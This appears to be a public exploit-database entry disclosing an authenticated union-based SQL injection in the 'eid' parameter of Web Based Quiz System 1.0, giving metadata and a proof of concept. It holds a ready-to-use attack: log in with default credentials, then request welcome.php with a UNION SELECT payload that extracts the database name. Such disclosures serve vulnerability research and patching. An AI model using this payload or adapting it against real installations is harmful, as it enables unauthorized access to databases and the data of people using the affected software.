# Exploit Title: Web Based Quiz System 1.0 - 'eid' Union Based Sql Injection (Authenticated)# Date: 04-03-2021# Exploit Author: Deepak Kumar Bharti# Vendor Homepage: https://www.sourcecodester.com# Software Download Link: https://www.sourcecodester.com/php/14727/web-based-quiz-system-phpmysqli-full-source-code.html# Software: Web Based Quiz System# Version: 1.0# Tested on: Windows 10 Pro# Union Based Sql Injection has been discovered in the Web Based Quiz System created by sourcecodester/janobe# in Welcome page in quiz section eid parameter affected from this vulnerability.# URL: http://localhost/welcome.php?q=quiz&step=2&eid=60377db362694' Union Select 1,database(),database(),4,5-- -&n=2&t=34
POC:# go to url http://localhost/login.php# then you have to login with default creds# then go to quiz and execute the payload ie:--
http://localhost/welcome.php?q=quiz&step=2&eid=60377db362694' Union Select 1,database(),database(),4,5---&n=2&t=34
